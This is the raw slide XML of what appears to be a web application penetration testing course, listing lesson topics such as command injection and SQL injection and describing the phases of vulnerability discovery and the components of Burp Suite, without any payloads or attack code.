          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="707084"/>
            <a:ext cx="3429000" cy="5922315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99FFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Vulnerability Discovery Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Creating Custom Scripts for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Python for Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Exercise: Python Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Vulnerabilities and Manual</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Verification Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Fiddler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> OWASP Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Exercise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Information Leakage &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Directory Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Directory Browsing Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Blind SQL Injection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685800" y="76200"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="228600" y="1143000"/>
            <a:ext cx="8610600" cy="4674870"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In our methodology, this is the first explicitly "malicious" traffic being sent to target systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Although please note that some people find port scans and aggressive application mapping to be malicious</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Discovery is where we really start prodding the web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We will be looking for potential weaknesses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The purpose of this step is to find the path to exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This phase builds on the work and discoveries of the previous two steps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Exploitation comes after this discovery phase</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>But some small exploitation to verify discovered flaws happens here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We will focus on server-side vulnerability discovery in this session (PEWAPT101.3 and PEWAPT101.4)</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a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Suite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66563" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1706880"/>
            <a:ext cx="8077200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Very powerful suite of tools available from http://portswigger.net</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Provides low-level access to the HTTP protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp allows us to modify requests and responses, but does not break things out in the user friendly way </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>WebScarab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> does</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Requires deeper knowledge of HTTP than other similar tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We covered HTTP in PEWAPT101.1 to a level of depth sufficient for using the Burp Suite effectively</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp it has two versions, the free and professional versions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The professional versions includes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The ability to save and restore state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Search capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Full version of Burp Intruder, including no time-based throttling and a set of attack strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Scanner, a web vulnerability scanner</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a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Suite Components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67587" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1676400"/>
            <a:ext cx="3200400" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Intercepts HTTP/S connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Spider</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Crawls a web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Intruder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Attack tool that contains a large number of attack methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Repeater</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Repeats interactions/attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Sequencer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Analyzes session tokens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Decoder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
